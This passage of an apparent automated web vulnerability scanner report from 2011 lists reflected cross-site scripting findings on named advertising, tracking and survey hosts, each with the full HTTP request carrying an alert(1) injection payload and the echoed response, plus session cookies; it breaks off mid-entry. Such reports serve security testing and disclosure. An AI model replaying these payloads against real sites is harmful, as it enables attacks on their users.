http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cd3"><script>alert(1)</script>0d09c856d2f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D89cd3"><script>alert(1)</script>0d09c856d2f&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:34 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5702 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]89cd3"><script>alert(1)</script>0d09c856d2f" target="_blank"> ...[SNIP]...
|
5.57. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpjs parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0ac"%3balert(1)//c837e622ffd was submitted in the mpjs parameter. This input was echoed as fd0ac";alert(1)//c837e622ffd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930fd0ac"%3balert(1)//c837e622ffd&mpt=[187845622ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:36 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5515 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank"><img src="ht ...[SNIP]... &crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=161611318102790930&advid=421303&sid=161611318102790930&adid= img-cdn.mediaplex.com/0/16161/Nielsen_pixel.js?crid=8095899&plid=161611318102790930fd0ac";alert(1)//c837e622ffd").split( " " ); for( var i = 0; i < mpjs.length; i++ ) { document.write( "<" + "script type=\"text/javascript\" src=\"http://" + mpjs[i]+ "\"> ...[SNIP]...
|
5.58. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c5b2'%3balert(1)//ac7d3b9268 was submitted in the mpvc parameter. This input was echoed as 9c5b2';alert(1)//ac7d3b9268 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=9c5b2'%3balert(1)//ac7d3b9268 HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:37 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5624 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="9c5b2';alert(1)//ac7d3b9268http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" t ...[SNIP]... <a href="9c5b2';alert(1)//ac7d3b9268http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank"> ...[SNIP]...
|
5.59. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a572"><script>alert(1)</script>d6187dfdcba was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=2a572"><script>alert(1)</script>d6187dfdcba HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:37 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5702 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="2a572"><script>alert(1)</script>d6187dfdcbahttp://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank"> ...[SNIP]...
|
5.60. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d29e"%3balert(1)//423b4752c6c was submitted in the mpvc parameter. This input was echoed as 3d29e";alert(1)//423b4752c6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=3d29e"%3balert(1)//423b4752c6c HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:37 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5629 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="3d29e";alert(1)//423b4752c6chttp://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("3d29e";alert(1)//423b4752c6c"); mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("3d29e";alert(1)//423b4752c6c"); mpvc = encodeURIComponent(mpvclick2); } else { mpvc = ("3d29e"%3balert(1)//423b4 ...[SNIP]...
|
5.61. http://js.revsci.net/gateway/gw.js [csid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 5c352<script>alert(1)</script>41b3f27eee6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=I098395c352<script>alert(1)</script>41b3f27eee6 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://answerology.delish.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 17 Sep 2011 13:57:30 GMT Cache-Control: max-age=86400, private Expires: Sun, 18 Sep 2011 13:57:30 GMT X-Proc-ms: 0 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 13:57:30 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "I098395C352<SCRIPT>ALERT(1)</SCRIPT>41B3F27EEE6" was not recognized. */
|
5.62. http://survey.questionmarket.com/surv/913131/newai.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://survey.questionmarket.com |
| Path: |
/surv/913131/newai.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8091f><script>alert(1)</script>6105b19a1aabc213a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /surv/913131/newai.php/8091f><script>alert(1)</script>6105b19a1aabc213a?action=nextpage&age=99&country=38&localtime=9-17-2011+14%3A35%3A31&flashinstalled=false&screenheight=1200&screenwidth=1920&x=60&y=24 HTTP/1.1 Host: survey.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:59:10 GMT Server: Apache Cache-Control: max-age=0, no-store, must-revalidate, no-cache Pragma: no-cache Expires: -1 Last-Modified: Sat, 17 Sep 2011 14:59:10 GMT P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Vary: Accept-Encoding Content-Length: 8124 Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <form method=post action=/surv/913131/newai.php/8091f><script>alert(1)</script>6105b19a1aabc213a name="surveyform" id="surveyform" class="dl_surveyform"> ...[SNIP]...
|
5.63. http://tps31.doubleverify.com/visit.js [plc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://tps31.doubleverify.com |
| Path: |
/visit.js |
Issue detail
The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14554'%3balert(1)//a7e15116687 was submitted in the plc parameter. This input was echoed as 14554';alert(1)//a7e15116687 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visit.js?ctx=936622&cmp=1059600&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=16161131810279093014554'%3balert(1)//a7e15116687&advid=421303&sid=161611318102790930&adid=&&num=312&srcurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&curl=&qpgid= HTTP/1.1 Host: tps31.doubleverify.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 14:36:07 GMT Connection: close
function obaCallback() { new OBACan({ "agncid": '936622', "cmpid": '1059600', "plcid": '16161131810279093014554';alert(1)//a7e15116687', "sid": '161611318102790930' }, { "advName": 'Wells Fargo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'https://www.wellsfargo.com/privacy_security/privacy/', "advLogoUR ...[SNIP]...
|
5.64. http://tps31.doubleverify.com/visit.js [sid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://tps31.doubleverify.com |
| Path: |
/visit.js |
Issue detail
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d772'%3balert(1)//d4b9275abe2 was submitted in the sid parameter. This input was echoed as 1d772';alert(1)//d4b9275abe2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visit.js?ctx=936622&cmp=1059600&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=161611318102790930&advid=421303&sid=1616113181027909301d772'%3balert(1)//d4b9275abe2&adid=&&num=312&srcurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&curl=&qpgid= HTTP/1.1 Host: tps31.doubleverify.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 14:36:17 GMT Connection: close
function obaCallback() { new OBACan({ "agncid": '936622', "cmpid": '1059600', "plcid": '161611318102790930', "sid": '1616113181027909301d772';alert(1)//d4b9275abe2' }, { "advName": 'Wells Fargo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'https://www.wellsfargo.com/privacy_security/privacy/', "advLogoURL": 'http://cdn.doubleverify. ...[SNIP]...
|
5.65. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdb2"><script>alert(1)</script>caecd352e14 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=8bdb2"><script>alert(1)</script>caecd352e14 HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:34 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com x_transtrans: 10.6.10.688 Content-Type: text/html Content-Length: 5505 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... 034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=8bdb2"><script>alert(1)</script>caecd352e14http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475"> ...[SNIP]...
|
5.66. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8ba'-alert(1)-'162898ef1f3 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=7d8ba'-alert(1)-'162898ef1f3 HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:34 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com x_transtrans: 11.6.10.688 Content-Type: text/html Content-Length: 5430 Connection: close
<SCRIPT LANGUAGE="JavaScript">
